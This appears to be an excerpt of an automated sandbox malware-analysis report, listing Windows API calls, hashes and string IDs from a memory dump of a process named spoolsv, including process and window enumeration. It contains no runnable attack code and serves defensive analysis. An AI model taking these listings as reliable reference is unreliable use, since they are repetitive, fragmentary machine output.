                                                                                                        • String ID:
                                                                                                        • API String ID: 185507032-0
                                                                                                        • Opcode ID: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                                                                        • Instruction ID: f84d6c0ac8f674a6599e0b2749f10f63cfea0163ede0fee5985a43e8fc28d286
                                                                                                        • Opcode Fuzzy Hash: baea71bdd7c72920dabe1177effcbf5504b31f12a8aae7cd7971186c44ea1b49
                                                                                                        • Instruction Fuzzy Hash: 59114FB1205324AAD200EB65EC46F9F77ACAB54704FC0491FB754D60E2DE78D944C76A
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                                                                        • LocalFree.KERNEL32(009FCDA8,00000000,00422D9C), ref: 00422CE9
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,009FCDA8,00000000,00422D9C), ref: 00422D0D
                                                                                                        • LocalFree.KERNEL32(00000000,009FCDA8,00000000,00422D9C), ref: 00422D5E
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                                                                        • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3782394904-0
                                                                                                        • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                                                                        • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422CD7
                                                                                                        • LocalFree.KERNEL32(009FCDA8,00000000,00422D9C), ref: 00422CE9
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,009FCDA8,00000000,00422D9C), ref: 00422D0D
                                                                                                        • LocalFree.KERNEL32(00000000,009FCDA8,00000000,00422D9C), ref: 00422D5E
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422D8C
                                                                                                        • RtlDeleteCriticalSection.NTDLL(0051C5CC), ref: 00422D96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3782394904-0
                                                                                                        • Opcode ID: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction ID: 51b20bc82c46605137a71ee0876b208d9b0e80c496a26de6aac0e9cff921d01f
                                                                                                        • Opcode Fuzzy Hash: 520aaeab858216aa6be7b821c17dc9bd15337d80360f4e9e100d51cd42fe918b
                                                                                                        • Instruction Fuzzy Hash: D8218170781610BFD710EBA8EA45B997FE4E719304F914497F400D73A1C6BDB984EB19
                                                                                                        APIs
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                                                                        • GetCommandLineA.KERNEL32 ref: 004279E7
                                                                                                        • GetVersion.KERNEL32 ref: 004279FB
                                                                                                        • GetVersion.KERNEL32 ref: 00427A0C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                                                                          • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                          • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                          • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        • GetThreadLocale.KERNEL32 ref: 00427A28
                                                                                                          • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3734044017-0
                                                                                                        • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                                                                        • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                                                                        APIs
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000000), ref: 004243D9
                                                                                                          • Part of subcall function 004243D4: GetKeyboardType.USER32(00000001), ref: 004243E5
                                                                                                        • GetCommandLineA.KERNEL32 ref: 004279E7
                                                                                                        • GetVersion.KERNEL32 ref: 004279FB
                                                                                                        • GetVersion.KERNEL32 ref: 00427A0C
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00427A48
                                                                                                          • Part of subcall function 00424404: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                          • Part of subcall function 00424404: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                          • Part of subcall function 00424404: RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        • GetThreadLocale.KERNEL32 ref: 00427A28
                                                                                                          • Part of subcall function 004278B8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3734044017-0
                                                                                                        • Opcode ID: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction ID: d1f10ed7233c6c26cc9ab7a9211c78b7d6b8eafa5dd651b04747b7567f40d78a
                                                                                                        • Opcode Fuzzy Hash: 26c5f3c9ca2902f351c218a0efba43a9c17a4940e5446c2a9e3ce4aa00990253
                                                                                                        • Instruction Fuzzy Hash: 130156B0684261D9E714FBB1B90A38D3E50BB25308FC1955F944086262E7BE014CEB7E
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(00000000,?), ref: 004E75A6
                                                                                                          • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E7557
                                                                                                          • Part of subcall function 004CF648: Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                                                                        • EnumWindows.USER32(004E7268,?), ref: 004E76D1
                                                                                                          • Part of subcall function 004CF628: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E76C3
                                                                                                          • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                                                                          • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                                                                          • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCloseHandleProcess32$CreateEnumFindFirstFreeNextSnapshotToolhelp32WindowWindows
                                                                                                        • String ID: 4rN
                                                                                                        • API String ID: 2697489950-1347347389
                                                                                                        • Opcode ID: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                                                                        • Instruction ID: 81800b201d129eb233c86aa27584eaf6e594e3464967b80929217755b8ff651a
                                                                                                        • Opcode Fuzzy Hash: f194a714a7efd85bda473ecfc0a6603ba410595ee8a9a87fd8048d74f52a551e
                                                                                                        • Instruction Fuzzy Hash: 1AB1B6347042598BCB20FB26DC85ABE77B6AF44315F5045ABE80497355E73CEE458B88
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B$<B
                                                                                                        • API String ID: 3192549508-3130809168
                                                                                                        • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                                                                        • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424C8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B$<B
                                                                                                        • API String ID: 3192549508-3130809168
                                                                                                        • Opcode ID: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction ID: ba7fb83052fc80cd7703b70a966ced7e32abaed02e915777dc773f657e1679cb
                                                                                                        • Opcode Fuzzy Hash: 61ea2ded6a3fe5bb661d9684595d8f3dcd9852728339d15bbff64cb3e4822364
                                                                                                        • Instruction Fuzzy Hash: 9041A0707042219FD720DF19E884B2BBBE5EFC8354FA6855AE84887351C739EC45CB69
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                        • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                        • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                                                                        • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424426
                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00424459
                                                                                                        • RegCloseKey.ADVAPI32(?,0042447C,00000000,?,00000004,00000000,00424475,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0042446F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                        • Opcode ID: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction ID: f32d36fbebf6c4c7954b05bf0a9ffb8b8aa37f3b827fee81d15b76f4adfa98af
                                                                                                        • Opcode Fuzzy Hash: da2b4d77520dffc7498c5254fd507111a2b61757f3a216e35b9f8c8fb5b33fc9
                                                                                                        • Instruction Fuzzy Hash: 0601D875B00318BAE711EBE0ED42FBD77FCEB48700F9000A6BA00D6580E6B96A15D76C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                                                                        • Instruction ID: 11a4c6921ebe278047dcd8f13468105319aefaf55964cb1d796cf0fb5e4db3cb
                                                                                                        • Opcode Fuzzy Hash: 9fe27699cabda99f2469338a0172294736777644ee96d5e14d692abe27671e06
                                                                                                        • Instruction Fuzzy Hash: 72D1C735B0010AEFCF10EF94C4919EDBBB5EF4D710F55A4AAE840A7311D638AE46CB69
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000D100,00000000,00000000,00000004), ref: 0042E207
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000D100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                                                                        • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                        • String ID:
                                                                                                        • API String ID: 4102113445-0
                                                                                                        • Opcode ID: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                                                                        • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                                                                        • Opcode Fuzzy Hash: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                                                                        • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0002E100,00000000,00000000,00000004), ref: 0042E207
                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,Function_0002E100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                                                                        • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                        • String ID:
                                                                                                        • API String ID: 4102113445-0
                                                                                                        • Opcode ID: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                                                                        • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                                                                        • Opcode Fuzzy Hash: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                                                                        • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                        • Opcode ID: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                                                                        • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                                                                        • Opcode Fuzzy Hash: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                                                                        • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                                                                          • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                        • Opcode ID: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                                                                        • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                                                                        • Opcode Fuzzy Hash: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                                                                        • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                                                                        APIs
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 004E72B0
                                                                                                        • GetClassNameW.USER32(?,?,00000200), ref: 004E732F
                                                                                                        • GetWindowTextW.USER32(?,?,00000200), ref: 004E7396
                                                                                                          • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                                                                          • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                                                                          • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocWindow$ClassFreeNameProcessTextThread
                                                                                                        • String ID: qN
                                                                                                        • API String ID: 1689834521-1131524284
                                                                                                        • Opcode ID: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                                                                        • Instruction ID: 384b602530dd3e7abee933e9cb9e54516736a920c6d3bdd50a0cb6d10c4ed17f
                                                                                                        • Opcode Fuzzy Hash: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                                                                        • Instruction Fuzzy Hash: E3415F74A0421D9FCB60EF59C885ED9B3B4EB48304F5085AAE808D7351DB34AE85CF95
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00003A8C), ref: 00424B33
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
